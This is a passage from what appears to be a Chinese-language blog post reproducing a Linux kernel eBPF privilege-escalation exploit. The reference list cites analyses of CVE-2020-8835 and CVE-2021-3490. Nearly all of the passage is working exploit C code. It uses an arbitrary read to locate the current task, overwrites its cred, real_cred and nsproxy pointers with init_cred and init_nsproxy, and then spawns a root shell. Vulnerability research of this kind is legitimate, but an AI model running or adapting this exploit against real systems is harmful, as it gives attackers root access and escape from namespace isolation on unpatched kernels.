        if (arb_read(current_task+0xa58) == tag) {
            break;
        }
        current_task = arb_read(current_task + 0x7a8) - 0x7a0;
        if (current_task == init_task) {
            /* Came full circle without finding our own entry. */
            err_exit("FAILED to find current task");
        }
    }
    hexx("current_task", current_task);
}
/*
 * Entry point: set up, leak addresses, install the write primitive, then
 * overwrite three pointer fields of the located task entry and hand over to
 * get_root_shell().
 *
 * Each pointer is written as two overlapping 32-bit stores: bits 0..31 at
 * the field offset, then bits 16..47 at offset + 2. The top 16 bits of the
 * field are never written.
 */
int main(int argc, char** argv, char** envp)
{
    init();
    prep();
    leak();
    prep_arb_write();

    /* Field offsets as noted by the author: cred 0xa48, real_cred 0xa40, nsproxy 0xaa8. */
    const uint64_t patches[][2] = {
        { 0xa48, init_cred },
        { 0xa40, init_cred },
        { 0xaa8, init_nsproxy },
    };

    for (size_t i = 0; i < sizeof(patches) / sizeof(patches[0]); i++) {
        uint64_t field = current_task + patches[i][0];
        uint64_t ptr = patches[i][1];

        arb_write_4_byte(field, ptr & 0xffffffff);
        arb_write_4_byte(field + 2, (ptr >> 16) & 0xffffffff);
    }

    get_root_shell();
    puts("EXP NERVER END!");
    return 0;
}
效果如下:
参考
【kernel exploit】CVE-2020-8835:eBPF verifier 错误处理导致越界读写
CVE-2020-8835_eBPF提权漏洞分析
【CVE.0x0A】CVE-2021-3490 漏洞复现及简要分析